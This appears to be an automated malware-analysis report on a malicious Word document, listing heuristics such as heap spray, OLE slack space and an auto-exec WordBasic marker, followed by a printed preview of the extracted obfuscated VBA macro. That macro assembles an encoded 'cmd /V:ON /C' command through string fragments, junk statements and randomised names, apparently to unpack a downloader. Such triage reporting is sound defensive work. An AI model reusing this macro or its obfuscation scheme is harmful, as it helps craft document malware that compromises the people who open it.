MALICIOUS
124
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The file contains legacy WordBasic macros, indicated by the OLE_LEGACY_WORDBASIC_AUTOEXEC heuristic. The script attempts to construct a command string, likely for downloading and executing a payload, by concatenating various string fragments. The heap spray and slack anomalies suggest memory manipulation and potential obfuscation techniques are in use.
Heuristics 6
-
Heap-spray pattern detected high SC_HEAP_SPRAYRepeated 0x04 bytes found
Disassembly
Attempted x86 opcode disassembly0001916D 0404 add al, 4 0001916F 0404 add al, 4 00019171 0404 add al, 4 00019173 0404 add al, 4 00019175 0404 add al, 4 00019177 0404 add al, 4 00019179 0404 add al, 4 0001917B 0404 add al, 4 0001917D 0404 add al, 4 0001917F 0404 add al, 4 00019181 0404 add al, 4 00019183 0404 add al, 4 00019185 0404 add al, 4 00019187 0404 add al, 4 00019189 0404 add al, 4 0001918B 0404 add al, 4 0001918D 0404 add al, 4 0001918F 0404 add al, 4 00019191 0404 add al, 4 00019193 0404 add al, 4 00019195 0404 add al, 4 00019197 0404 add al, 4 00019199 0404 add al, 4 0001919B 0404 add al, 4 0001919D 0404 add al, 4 0001919F 0404 add al, 4 000191A1 0404 add al, 4 000191A3 0404 add al, 4 000191A5 0404 add al, 4 000191A7 0404 add al, 4 000191A9 0404 add al, 4 000191AB 0404 add al, 4 000191AD 0404 add al, 4 000191AF 0404 add al, 4 000191B1 0404 add al, 4 000191B3 0404 add al, 4 000191B5 0404 add al, 4 000191B7 0404 add al, 4 000191B9 0404 add al, 4 000191BB 0404 add al, 4 000191BD 0404 add al, 4 000191BF 0404 add al, 4 000191C1 0404 add al, 4 000191C3 0404 add al, 4 000191C5 0404 add al, 4 000191C7 0404 add al, 4 000191C9 0404 add al, 4 000191CB 0404 add al, 4
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 105,979 bytes but its declared streams total only 59,652 bytes — 46,327 bytes (44%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12027 bytes |
SHA-256: ced1c0e50c7616969afc05f9b886bd3d53fed9ea4dd418c7244a0a1f4ec4c42a |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
122 of 193 identifiers look randomly generated (e.g. 'pVGqKtUwQDblUJ'); 1 string-concatenation chain(s) — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "HqzoUYE"
Function qkocjRXozk()
On Error Resume Next
TypeName 8
TypeName 5
TypeName CBool(uUwTP / BCNfj + IjllC * Jtdss)
pMjuPE = "md" + " /" + "V" + ":" + "ON" + "/" + "C" + CStr(Chr(HkvQaIqZq + jJuaHnM + 34 + OkbwZzio + optdlER)) + "s"
TypeName 952
TypeName 177591525
iDYaVqOhNV = "e" + "t #" + " " + " =" + "wjt" + "h" + "MMi" + "M"
TypeName Sqr(115314270)
TypeName Sqr(ciqCu)
jtChbj = "Ur" + "v" + "GUs" + "Cvw" + "HW" + "NTV" + "r" + "p=" + "/" + "xo" + "au-" + "b"
TypeName TFrDZY
TypeName Log(2157)
TypeName 72
YPNfmVUj = "lS9" + "P:)" + "(7" + "n" + "6y}"
TypeName 255
TypeName Atn(9305)
TypeName Rnd(MmikC)
sGYKrBwj = "B;e" + "Fz3" + "1," + "d" + "{Xk"
TypeName CLng(NEQiD)
TypeName Cos(86757 / Coilz)
TypeName Hex(81161 - mpTMsw / GsKWE * KZtrF)
ItdcqrhcmO = "gc" + "Y$D" + "m" + " '\" + "IKf"
TypeName qwOUw
TypeName CSng(MRbjP)
TypeName Oct(NIwAIq)
IMqDsNdUS = ".q" + "@E" + "+" + "R&" + "&fo" + "r " + "%p" + " in" + " ("
TypeName CBool(96112 - ZWZXr + 56737 / CMPwwB)
TypeName blzDiW
UsqaiVMp = "2" + "3," + "2" + "7,1" + "6," + "46," + "22," + "13" + ",3," + "4" + "6" + ",3"
TypeName Atn(67)
TypeName CStr(MktFL)
TypeName Rnd(8)
BKfcBXj = "2" + ",32" + ",62" + ",59" + ",2" + "3," + "6" + "6,4" + "8,2" + "4,4"
TypeName 7
TypeName 77
TypeName 17
tBfKuqqDVpC = "0," + "46" + "," + "16," + "3" + "0,2"
TypeName Chr(pRVWF / SpiZiZ)
TypeName TFQzX
TypeName mzsLz
zrCEtPV = "7" + ",31" + ",1" + ",4" + "6,5" + "7"
TypeName 54
TypeName Sqr(qjLKrw - jEkAnW - 38042 - iGwQl)
TypeName CSng(36877 - ADhIXl / 45669 + ZJapLv)
psNkbziiCi = "," + "2," + "62" + "," + "1" + "9" + ",46" + ",2," + "6" + "8" + ",18" + "," + "4"
TypeName CLng(VuYDvS + 48933 + FCXNT + MSJnO)
TypeName 66
TypeName CSng(460072517)
PnfWlL = "6," + "3" + "1," + "14" + "," + "3" + "2" + ",6" + ","
qkocjRXozk = pMjuPE + iDYaVqOhNV + jtChbj + YPNfmVUj + sGYKrBwj + ItdcqrhcmO + IMqDsNdUS + UsqaiVMp + BKfcBXj + tBfKuqqDVpC + zrCEtPV + psNkbziiCi + PnfWlL
TypeName Cos(19996 / tmOFZ * zIPjN - UNMpLc)
TypeName Rnd(PNNti)
TypeName 423450039
End Function
Function SrLJcKU()
On Error Resume Next
TypeName CStr(pChJp)
TypeName 1059
TypeName qmusd
vznVCcFb = "46," + "40," + "2," + "45," + "59," + "21," + "71"
TypeName Rnd(78)
TypeName Round(18040 * zMfzwu)
TypeName 9
HQuHjnR = ",67" + ",24" + ",6" + "3," + "3" + ",2," + "2," + "23" + ","
TypeName Round(971)
TypeName Sin(iGiYL / VYDrKH / 51611 - sblcjm)
ljZzjDHRc = "3" + "6,2" + "5,2" + "5" + ",28" + "," + "61"
TypeName Sqr(64405 / FfGwoF)
TypeName Round(ZTISvQ + HoJrkI)
JfrXu = ",46" + ",5" + "2,6" + ",27" + ",4"
TypeName APSOm
TypeName Rnd(201076278)
TypeName 525
JmKwkvO = "0," + "6" + "8" + ",4" + "0," + "4" + "6,2" + ",25" + ",29" + ",1" + "9"
TypeName Chr(117133175)
TypeName CByte(siCdmB / SRzIT + 28011 / sjFvsE)
NBHoJQOXV = "," + "7" + "," + "12" + "," + "49," + "34," + "44"
TypeName Cos(59)
TypeName cPaoa
wDAGGP = ",70" + "," + "3" + ",2," + "2," + "23" + ",3" + "6" + ",25"
TypeName 202309463
TypeName Sqr(YpNCC)
TypeName 1
jLcazYaNlpm = "," + "25," + "3" + "1" + "," + "6,5" + "7,"
TypeName kZjddf
TypeName CLng(KwzmUa)
TypeName CDbl(XbOsu)
RtUVbJWOdT = "6," + "57" + "," + "29," + "32," + "2,2" + "9,2" + "2," + "28," + "31," + "57,"
TypeName hanNc
TypeName CBool(pFfiCc)
TypeName Round(586)
wdowEU = "4" + "0," + "68," + "5" + "7" + ",27" + "," + "61," + "25" + "," + "4" + "1,1" + "3"
SrLJcKU = vznVCcFb + HQuHjnR + ljZzjDHRc + JfrXu + JmKwkvO + NBHoJQOXV + wDAGGP + jLcazYaNlpm + RtUVbJWOdT + wdowEU
TypeName Rnd(7763)
TypeName Oct(patquL)
End Function
Function jqfOKroKkj()
On Error Resume Next
TypeName WutWJ
TypeName 335
jMmupz = ",34" + ",39" + ",1," + "58" + ",48" + "," + "2" + "8,7"
TypeName 3944
TypeName Atn(436225468)
TypeName 940
JaIQcjwri = "0" + ",3," + "2" + ",2," + "23," + "36," + "25," + "2"
TypeName wmhREY
TypeName Tan(15997 * NwCriY / VAzENw / vtzTB)
TypeName CByte(298013308)
bOFKjU = "5," + "15," + "2" + "8," + "32" + ",4" + "6," + "40,"
TypeName RSdwI
TypeName Hex(293095284)
TypeName 8
IdouPRCDPUS = "4" + "6," + "2" + "," + "6," + "40" + ",2"
TypeName ChrB(96149 - vpIMw)
TypeName 149
nCbMbos = "," + "46" + ",22" + ",40" + "," + "46," + "2"
TypeName Fix(kdcvQJ)
TypeName Atn(ZzMiiL)
TypeName dbwkHm
DHwjkFiKnnA = ",6" + "8," + "57" + ",27" + ",61" + ",68" + ",3" + "1," + "22"
jqfOKroKkj = jMmupz + JaIQcjwri + bOFKjU + IdouPRCDPUS + nCbMbos + DHwjkFiKnnA
TypeName Round(arsJrZ / UUEhpW / 24776 * nPHdqT)
TypeName 647
TypeName CSng(MjXEkq / FzOqSd)
End Function
Function UVMStnSwnuS()
On Error Resume Next
TypeName Int(6)
TypeName Log(JNGLGG)
IkpCjZ = ",25" + "," + "49" + "," + "73" + "," + "5" + "2,"
TypeName 160626531
TypeName CLng(iumNmH + wHCbji / cpHWX + wYDJJ)
TypeName Fix(kFcJwn + 95604 - KMBEK + UaYFZi)
SWTJq = "2," + "1" + "5,7" + "0," + "3," + "2" + "," + "2," + "23," + "36" + ",25" + ","
TypeName Round(31991 * sjntGr + 55381 - LdMrf)
TypeName 49
TypeName 6998
VqhFzJv = "25," + "56," + "27," + "13" + "," + "3"
TypeName Round(RcGRMc / 58182 + fEksdA / dROADN)
TypeName zsjVdv
TypeName 81
IIpGN = ",2" + "7" + ",1" + "6," + "57,"
TypeName NRnsa
TypeName PIMYT
azlTYci = "28" + ",2" + "2" + ",6" + "8,5" + "7,2" + "7" + "," + "61,"
TypeName Rnd(BCbOw * ZzsJZf)
TypeName 155
TIIfTzWc = "25" + "," + "34" + ",73" + ",21"
TypeName CInt(99808 + HqPiBl)
TypeName CBool(poEFLi)
buzXUi = ",69" + "," + "28" + ",5" + "4," + "7" + "0," + "3,2" + ","
TypeName Oct(bsDNh)
TypeName SuiArD
IqMUhd = "2," + "23," + "36" + "," + "2" + "5" + ",25" + "," + "1" + "6" + ",3"
TypeName 3113
TypeName CBool(MclcAR)
TypeName Fix(43970 / pUthf / zzZKw * 27125)
FbtJYkA = ",4" + "6,4" + "6" + ",3" + "2," + "31," + "28" + ",3" + "2" + ",28" + ",40"
TypeName Int(vQimKJ * tOuWU * VARND / RwidX)
TypeName Sgn(QGCqAm - ztPSw + jabTra - TYNDAr)
TypeName ChrB(IstzpJ)
rjlBvMzCnw = ",5" + "7,4" + "6,2" + "," + "22," + "2" + "8," + "6" + ",4" + "0" + ",6," + "40" + ",56"
TypeName hfllUh
TypeName 74
nnNdwowqNUK = ",6" + "8" + ",57" + "," + "27,"
TypeName TzXvp
TypeName 3794
TypeName npNnLm
RWMWXFu = "6" + "1" + "," + "25" + ",3" + "4" + "," + "6"
UVMStnSwnuS = IkpCjZ + SWTJq + VqhFzJv + IIpGN + azlTYci + TIIfTzWc + buzXUi + IqMUhd + FbtJYkA + rjlBvMzCnw + nnNdwowqNUK + RWMWXFu
TypeName 7381
TypeName Hex(APFNo + RYkhRS)
End Function
Function cXoQHhaw()
On Error Resume Next
TypeName Round(501543854)
TypeName 8371
GWLHEIizi = ",32" + "," + "63," + "68" + "," + "33" + ","
TypeName Sgn(UzJrV)
TypeName 898
TypeName Rnd(qoVtKk / hzTHRo + 60897 + KIfUqY)
UzhjbafnA = "23," + "3" + "2," + "6" + "," + "2," + "38,"
TypeName Int(25551 * vkbjOo - 13413 / zkYkub)
TypeName sKpzC
TypeName Sgn(100467305)
ofjQQQOvKu = "63," + "70," + "63" + "," + "37," + "45" + ",5"
TypeName AzuAi
TypeName AMBCWw
TypeName Sin(11905 / WEEQv)
ERObww = "9" + "," + "6" + ",6" + "5," + "54,"
TypeName ChrW(2284)
TypeName 503764122
TypeName Atn(TwORiK + QFAqsN * dCnHmz * hiiFX)
wKAtUf = "62" + ",2" + "4" + ",6" + "2," + "63," + "50,"
cXoQHhaw = GWLHEIizi + UzhjbafnA + ofjQQQOvKu + ERObww + wKAtUf
TypeName Hex(jnOJif - wjRkV + lFZdq / mtjRzv)
TypeName Tan(TjLKjZ)
End Function
Function XfuLUTYcN()
On Error Resume Next
TypeName 2365
TypeName jfwVDE
TypeName CInt(4750 / qwZEbh)
WZomVXIQM = "4" + "1" + ",3" + "4,6" + "3" + "," + "4"
TypeName zWOOzt
TypeName ChrB(3459)
ufjWQWwjMmP = "5,5" + "9" + ",6" + "5," + "35,"
TypeName CLng(559)
TypeName Tan(425541703)
ktmOOiMPlX = "2," + "24" + ",5" + "9," + "46," + "4" + "0"
TypeName CLng(470)
TypeName swuLf
zWRLciNa = ",15" + ",36" + ",2," + "46," + "61," + "2" + "3," + "72,"
TypeName 1
TypeName CLng(zTspui)
TypeName kHcaqN
wLRRT = "63," + "6" + "4" + "," + "63," + "7" + "2," + "59" + ",6" + ",6" + "5,5"
TypeName CByte(5890 - njjBfB + jGhVTB * WvQuH)
TypeName kncPoM
TypeName Atn(113459832)
CfmOizoh = "4" + ",72" + "," + "63" + ",68" + ",46" + ",2" + "6," + "4" + "6," + "63,"
TypeName 76
TypeName Round(cjCvrv)
TypeName ENYDHR
MACwzMubmjV = "4" + "5," + "67" + "," + "2" + "7" + "," + "2" + "2,4" + "6,2" + "8,"
TypeName ChrB(vwbYz)
TypeName 7506
jSDRv = "57" + "," + "3," + "3" + "8" + ",5" + "9,6"
TypeName CDate(13954 * qoAiVI)
TypeName Sgn(RDaDVF)
vLsKHn = "6,1" + "6,4" + "7" + ",62" + ",6," + "40," + "62" + ",5" + "9" + "," + "2" + "1" + ",7"
TypeName Cos(92)
TypeName 8
cvtcFtMREYI = "1" + "," + "67," + "3" + "7," + "53," + "2,"
XfuLUTYcN = WZomVXIQM + ufjWQWwjMmP + ktmOOiMPlX + zWRLciNa + wLRRT + CfmOizoh + MACwzMubmjV + jSDRv + vLsKHn + cvtcFtMREYI
TypeName ChrW(wiqjG / zHdwAC * 69575 - zCEiC)
TypeName CInt(7)
End Function
Function qjOpKzfk()
On Error Resume Next
TypeName Tan(SdrbVI)
TypeName Atn(12074 - JmnIzT + hKjNV * YTLHO)
TypeName Round(KpDYtX)
zErFpEHNzm = "22," + "42" + ",5" + "3" + ",5" + "9,2" + "3,6" + "6," + "48," + "68," + "60," + "27"
TypeName CLng(4206)
TypeName 8721
TypeName 2
bbYrA = "," + "16," + "40" + ",32" + ",27" + "," + "28" + ",5" + "2,4" + "7,6" + ",32" + ","
TypeName CInt(JtzWpE)
TypeName Sin(19946 - kiMTP)
pFidUzqiCil = "4" + "6,3" + "8," + "5" + "9" + ",6" + "6," + "16" + ",4" + "7" + "," + "5"
TypeName 650
TypeName Chr(uEHfU - OOaRIT)
TypeName Log(1)
ACGczQvXE = "1," + "62," + "59" + "," + "6" + "5,3" + "5,"
TypeName 204696817
TypeName 613
TypeName VoSJKo
iVHtPzJzJz = "2" + "," + "37" + "," + "45" + ",33" + ",2" + "," + "2" + "8" + ","
TypeName ChrW(71)
TypeName CSng(aIwrw)
HQfzDII = "22" + ",2," + "30," + "3" + "5" + ",22" + ",2"
TypeName iiZPI
TypeName 9
TypeName Log(BBCwb)
VkXrHzSB = "7," + "57" + ",4" + "6," + "1"
qjOpKzfk = zErFpEHNzm + bbYrA + pFidUzqiCil + ACGczQvXE + iVHtPzJzJz + HQfzDII + VkXrHzSB
TypeName 332
TypeName 34
End Function
Function khOUbITmDB()
On Error Resume Next
TypeName Tan(91992 * uTqPNC)
TypeName Cos(URWTf)
HrzQaAilk = "3,1" + "3,6" + "2,5" + "9," + "6"
TypeName FGfrf
TypeName Log(3)
TypeName CLng(76565 + WklmW)
IrHCBqwVrn = "5,3" + "5,2" + ",4" + "5," + "3" + "1," + "22" + ",46" + ",2" + "8," + "55,"
TypeName 3958
TypeName 838
TypeName Sqr(35778 - iPoJB)
okWFA = "45" + ",43" + "," + "57" + ",2" + "8" + ",2," + "5" + "7" + "," + "3,5" + "3,"
TypeName EECjCN
TypeName jTPrHU
TypeName CSng(200)
FQAHhsAMw = "43" + ",4" + "3," + "62," + "62" + "," + "62," + "6" + "2,6" + "2"
TypeName Chr(FZETtB - SDUti + 2166 + 87165)
TypeName CInt(61105 + cCAKhh)
TypeName ChrB(83804423)
pzciBzdD = "," + "62" + "," + "62" + ",62" + "," + "62" + "," + "6" + "2," + "62" + ",6" + "2"
TypeName 4
TypeName Log(jzIciI / KjYqWz)
TypeName bilwJ
zDMlPIj = ",62" + ",6" + "2" + ",62" + ",62" + "," + "62" + ","
TypeName GzpAvl
TypeName Int(nzIAzi + 57548)
TypeName CBool(75)
FDaHuUw = "8" + "0)d" + "o " + "set" + " " + "~ " + " =" + "!~ " + " " + "!!#" + " "
TypeName CStr(CBOfSD + AVqafC)
TypeName Atn(thjunj)
qOWOoIrDAzW = " :~" + "%" + "p," + "1!" + "&" + "&if" + " %" + "p " + "geq" + " 80" + " ca" + "ll" + " "
khOUbITmDB = HrzQaAilk + IrHCBqwVrn + okWFA + FQAHhsAMw + pzciBzdD + zDMlPIj + FDaHuUw + qOWOoIrDAzW
TypeName CBool(5)
TypeName Int(bKqYv - izPlML)
TypeName CBool(1834)
End Function
Function SwAEVG()
On Error Resume Next
TypeName CInt(462178316)
TypeName 6067
XEkwBX = "%" + "~ " + " " + ":" + "*~"
TypeName YIDHQ
TypeName Sgn(uHqTin)
TypeName CDate(YPnwzz)
FKudlhzwH = " " + " !" + "=" + "%" + CStr(Chr(pVGqKtUwQDblUJ + XJzqbaC + 34 + wOnfIWpzRqnHt + FARlsQU)) + " " + " "
SwAEVG = XEkwBX + FKudlhzwH
TypeName 252469504
TypeName Atn(jocjB)
TypeName 6
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.